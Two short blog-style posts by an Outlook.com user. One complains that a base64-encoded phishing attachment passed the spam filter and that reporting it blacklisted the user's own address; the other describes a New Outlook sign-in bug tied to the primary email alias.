Outlook team, can you fix this?

I am getting this phishing email with an HTM attachment, BASE64 encoded of course, which then contains a webform with all assets, all parts BASE64 encoded. The form attempts to phish my password.

The Outlook.com spam filter does not recognize this blatant phish and delivers it as a legit email. I chose to report this phishing attempt so that Outlook.com recognizes this for future such emails.

Outlook chooses to put the sender on the blacklist and does not recognize that the FROM address contains my own mail address. If I did not check the source code of this mail, I would not even be aware that I am now unable to send myself documents.

Team, this is your fix list:

  • BASE64 is no rocket science and the HTM file makes it blatantly obvious it tries to steal passwords. This should be the easiest quarantine target out there if you take security seriously.
  • Blacklisting your own email address should really not be in the tool chest of a mail client, should it?

Update: I received helpful feedback from Microsoft on this issue. Safe Sender overrode spam detection in this case. Teams are working on both how to modernize this space more holistically and how to fix the anti-phishing gap.

Showstopper bug in New Outlook with Outlook.com

Microsoft is pushing the New Outlook app to Windows 11. It is replacing the old Mail & Calendar apps. However, I am unable to use this app with my Outlook.com account. And so do many others.

I have narrowed down the problem to a simple root cause: if you have set your personal mail address as your primary alias, you cannot add your Outlook.com account to New Outlook. If fails with both your personal email address and your Outlook.com address.

Only if you set your Outlook.com address as your primary alias, you will be able to add the account, but after that you cannot send mail from your personal email alias. Catch 22. Be extra careful when you do change your primany alias. You can only do that twice a week.

This bug is only in New Outlook and it only affects Outlook.com accounts. You can use Gmail accounts just fine. And you can use your personal email as primary alias in all other Microsoft apps, including Outlook on iOS and Outlook on Android, and the Outlook.com PWA.

I think it is quite hilarious that Microsoft only fails with the combination Windows + Outlook + Outlook.com. Let’s have a good laugh and then fix it.